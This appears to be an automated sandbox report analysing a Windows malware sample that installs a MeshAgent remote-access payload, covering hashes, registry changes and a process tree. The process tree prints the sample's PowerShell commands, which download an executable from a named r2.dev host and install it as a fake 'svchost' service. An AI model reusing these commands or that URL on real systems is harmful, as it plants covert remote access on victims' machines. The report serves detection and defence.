Analysis
-
max time kernel
149s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2024 07:04
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
Resource
win7-20240903-en
General
-
Target
2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
-
Size
10.1MB
-
MD5
8fd2994edebc3a3ddde2a14b3f5c4183
-
SHA1
51b0c1f0e5d9a1486ee49bf25e544e626a5c86c0
-
SHA256
c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4
-
SHA512
62620e6d802471ae663c89916f12fd3b68931cb141d80dc2444129f2d1b3f56a9a1630028d18ea08c6c8a595538bf114d24cb56269812f8bfd3c06c3ec1464eb
-
SSDEEP
196608:9RFHibb0Dpz7Omna1cCwvylAjWZ0Xq9YLuxMfCVb2XGh22KNL7P+wherA+O7f:tibgDpz7TnaqtvylAjWZ0Xq9YLuxMfC4
Malware Config
Signatures
-
Detects MeshAgent payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp family_meshagent behavioral2/memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp family_meshagent behavioral2/memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp family_meshagent behavioral2/memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp family_meshagent behavioral2/memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp family_meshagent -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 2 3636 powershell.exe 19 2368 powershell.exe 21 3176 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 376 powershell.exe 1480 powershell.exe 1536 powershell.exe 764 powershell.exe 2368 powershell.exe 3176 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" svchost.exe -
Executes dropped EXE 3 IoCs
Processes:
_가이아서버 접속기.exesvchost.exesvchost.exepid process 60 _가이아서버 접속기.exe 3284 svchost.exe 668 svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 64 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\combase.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\bcryptprimitives.pdb svchost.exe File opened for modification C:\Windows\System32\kernelbase.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6F20C0854D11B015FEDD40C59EF0A2A2E0285DD3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys svchost.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb svchost.exe File opened for modification C:\Windows\System32\win32u.pdb svchost.exe File opened for modification C:\Windows\System32\ole32.pdb svchost.exe File opened for modification C:\Windows\System32\bcrypt.pdb svchost.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb svchost.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\exe\svchost.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb svchost.exe File opened for modification C:\Windows\System32\advapi32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\advapi32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb svchost.exe File opened for modification C:\Windows\System32\crypt32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb svchost.exe File opened for modification C:\Windows\System32\svchost.pdb svchost.exe File opened for modification C:\Windows\System32\kernel32.pdb svchost.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb svchost.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb svchost.exe File opened for modification C:\Windows\System32\shcore.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb svchost.exe File opened for modification C:\Windows\System32\dll\shell32.pdb svchost.exe File opened for modification C:\Windows\System32\iphlpapi.pdb svchost.exe File opened for modification C:\Windows\System32\rpcrt4.pdb svchost.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb svchost.exe File opened for modification C:\Windows\System32\shell32.pdb svchost.exe File opened for modification C:\Windows\System32\gdiplus.pdb svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 svchost.exe File opened for modification C:\Windows\System32\ntdll.pdb svchost.exe File opened for modification C:\Windows\System32\dll\kernelbase.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb svchost.exe File opened for modification C:\Windows\System32\msvcrt.pdb svchost.exe File opened for modification C:\Windows\System32\dll\gdi32full.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb svchost.exe File opened for modification C:\Windows\System32\dbghelp.pdb svchost.exe File opened for modification C:\Windows\System32\ncrypt.pdb svchost.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\AD743BF6CD010272FEF925B0B1EE6A8A05B70C73 svchost.exe File opened for modification C:\Windows\System32\sechost.pdb svchost.exe File opened for modification C:\Windows\System32\ucrtbase.pdb svchost.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 svchost.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\user32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\combase.pdb svchost.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb svchost.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb svchost.exe File opened for modification C:\Windows\System32\dll\sechost.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb svchost.exe File opened for modification C:\Windows\System32\dll\gdi32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ole32.pdb svchost.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\local\svchost\svchost.exe upx behavioral2/memory/3284-81-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp upx behavioral2/memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp upx behavioral2/memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp upx behavioral2/memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp upx behavioral2/memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp upx behavioral2/memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp upx -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4296 60 WerFault.exe _가이아서버 접속기.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
_가이아서버 접속기.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _가이아서버 접속기.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133731902928711239" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3636 powershell.exe 3636 powershell.exe 764 powershell.exe 764 powershell.exe 376 powershell.exe 376 powershell.exe 2368 powershell.exe 2368 powershell.exe 3176 powershell.exe 3176 powershell.exe 1480 powershell.exe 1480 powershell.exe 1536 powershell.exe 1536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 376 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4340 wmic.exe Token: SeIncreaseQuotaPrivilege 4340 wmic.exe Token: SeSecurityPrivilege 4340 wmic.exe Token: SeTakeOwnershipPrivilege 4340 wmic.exe Token: SeLoadDriverPrivilege 4340 wmic.exe Token: SeSystemtimePrivilege 4340 wmic.exe Token: SeBackupPrivilege 4340 wmic.exe Token: SeRestorePrivilege 4340 wmic.exe Token: SeShutdownPrivilege 4340 wmic.exe Token: SeSystemEnvironmentPrivilege 4340 wmic.exe Token: SeUndockPrivilege 4340 wmic.exe Token: SeManageVolumePrivilege 4340 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4340 wmic.exe Token: SeIncreaseQuotaPrivilege 4340 wmic.exe Token: SeSecurityPrivilege 4340 wmic.exe Token: SeTakeOwnershipPrivilege 4340 wmic.exe Token: SeLoadDriverPrivilege 4340 wmic.exe Token: SeSystemtimePrivilege 4340 wmic.exe Token: SeBackupPrivilege 4340 wmic.exe Token: SeRestorePrivilege 4340 wmic.exe Token: SeShutdownPrivilege 4340 wmic.exe Token: SeSystemEnvironmentPrivilege 4340 wmic.exe Token: SeUndockPrivilege 4340 wmic.exe Token: SeManageVolumePrivilege 4340 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4972 wmic.exe Token: SeIncreaseQuotaPrivilege 4972 wmic.exe Token: SeSecurityPrivilege 4972 wmic.exe Token: SeTakeOwnershipPrivilege 4972 wmic.exe Token: SeLoadDriverPrivilege 4972 wmic.exe Token: SeSystemtimePrivilege 4972 wmic.exe Token: SeBackupPrivilege 4972 wmic.exe Token: SeRestorePrivilege 4972 wmic.exe Token: SeShutdownPrivilege 4972 wmic.exe Token: SeSystemEnvironmentPrivilege 4972 wmic.exe Token: SeUndockPrivilege 4972 wmic.exe Token: SeManageVolumePrivilege 4972 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4972 wmic.exe Token: SeIncreaseQuotaPrivilege 4972 wmic.exe Token: SeSecurityPrivilege 4972 wmic.exe Token: SeTakeOwnershipPrivilege 4972 wmic.exe Token: SeLoadDriverPrivilege 4972 wmic.exe Token: SeSystemtimePrivilege 4972 wmic.exe Token: SeBackupPrivilege 4972 wmic.exe Token: SeRestorePrivilege 4972 wmic.exe Token: SeShutdownPrivilege 4972 wmic.exe Token: SeSystemEnvironmentPrivilege 4972 wmic.exe Token: SeUndockPrivilege 4972 wmic.exe Token: SeManageVolumePrivilege 4972 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4292 wmic.exe Token: SeIncreaseQuotaPrivilege 4292 wmic.exe Token: SeSecurityPrivilege 4292 wmic.exe Token: SeTakeOwnershipPrivilege 4292 wmic.exe Token: SeLoadDriverPrivilege 4292 wmic.exe Token: SeSystemtimePrivilege 4292 wmic.exe Token: SeBackupPrivilege 4292 wmic.exe Token: SeRestorePrivilege 4292 wmic.exe Token: SeShutdownPrivilege 4292 wmic.exe Token: SeSystemEnvironmentPrivilege 4292 wmic.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.execmd.exepowershell.exeexplorer.exepowershell.exesvchost.exedescription pid process target process PID 4588 wrote to memory of 3636 4588 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe powershell.exe PID 4588 wrote to memory of 3636 4588 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe powershell.exe PID 4588 wrote to memory of 4564 4588 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe cmd.exe PID 4588 wrote to memory of 4564 4588 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe cmd.exe PID 4564 wrote to memory of 3564 4564 cmd.exe explorer.exe PID 4564 wrote to memory of 3564 4564 cmd.exe explorer.exe PID 3636 wrote to memory of 764 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 764 3636 powershell.exe powershell.exe PID 3388 wrote to memory of 60 3388 explorer.exe _가이아서버 접속기.exe PID 3388 wrote to memory of 60 3388 explorer.exe _가이아서버 접속기.exe PID 3388 wrote to memory of 60 3388 explorer.exe _가이아서버 접속기.exe PID 3636 wrote to memory of 376 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 376 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 2368 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 2368 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 3176 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 3176 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 1480 3636 powershell.exe powershell.exe PID 3636 wrote to memory of 1480 3636 powershell.exe powershell.exe PID 1480 wrote to memory of 3284 1480 powershell.exe svchost.exe PID 1480 wrote to memory of 3284 1480 powershell.exe svchost.exe PID 668 wrote to memory of 4340 668 svchost.exe wmic.exe PID 668 wrote to memory of 4340 668 svchost.exe wmic.exe PID 668 wrote to memory of 4972 668 svchost.exe wmic.exe PID 668 wrote to memory of 4972 668 svchost.exe wmic.exe PID 668 wrote to memory of 4292 668 svchost.exe wmic.exe PID 668 wrote to memory of 4292 668 svchost.exe wmic.exe PID 668 wrote to memory of 4968 668 svchost.exe wmic.exe PID 668 wrote to memory of 4968 668 svchost.exe wmic.exe PID 668 wrote to memory of 1452 668 svchost.exe wmic.exe PID 668 wrote to memory of 1452 668 svchost.exe wmic.exe PID 668 wrote to memory of 4872 668 svchost.exe wmic.exe PID 668 wrote to memory of 4872 668 svchost.exe wmic.exe PID 668 wrote to memory of 1536 668 svchost.exe powershell.exe PID 668 wrote to memory of 1536 668 svchost.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Users\Admin\AppData\local\svchost\svchost.exe"C:\Users\Admin\AppData\local\svchost\svchost.exe" -install4⤵
- Sets service image path in registry
- Executes dropped EXE
PID:3284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\explorer.exeexplorer.exe "_가이아서버 접속기.exe"3⤵PID:3564
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:60 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 4203⤵
- Program crash
PID:4296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 60 -ip 601⤵PID:4580
-
C:\Users\Admin\AppData\local\svchost\svchost.exe"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4972 -
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4292 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4968
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:1452
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1536
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
1KB
MD5e5063fb2c6625068c1224c68b5c1ce46
SHA18867a7637689af271e445a7379c810335591e708
SHA2562bfdeab5f252777c7bbbb7b8b033e03e37d3e2061dce73c8af03c196e1b26bfe
SHA512ad62e5268c8fe5b7b72d40d8724ab7ae2fa3d3e910122ad36f61e6c1ec81c22e1ef3b4477006085212b20342aa073ee2275e0095e92c4ac350df6814149aca58
-
Filesize
1KB
MD58a12c129e02e3d0e0ff14020158d6e53
SHA1383434d0df826622f06b1f3811124782df21507b
SHA256e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7
SHA5124b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.7MB
MD5c5fc53d3969bea56dc506c473b805c13
SHA17c59712142fe98d48ca6276851ee890585c9772a
SHA25621956ec4108a00fc6aae28ffa52ebb3dd76a1d9d1adac9648df2a6354646052c
SHA51279d45c966c534831b26e71b48f0a0690a8a61e4d47998deb1b2e35fb50a26fdea072db34805c7e1db35f105e3bd062f05094b102d5d6290bfa20c0847485856b
-
Filesize
131KB
MD572085bad44dad6707a598fd489c6850d
SHA137f2e77c5a5e1981c2753b974017d1842965f910
SHA256cc591d737cad43ec26a49ddb9128c42d709b0f0cff9630b77c963a263439e56f
SHA5120be7a5c2c1d351f4d041b9525c307dcdb8f365c543e7d1eb44761812458895be65f776c8dd5cc85ddfe9defe922f5c468ff266c242ccc895b928f388b70552ca
-
Filesize
1.6MB
MD5400b9faa5f261a5a0d194e633483571c
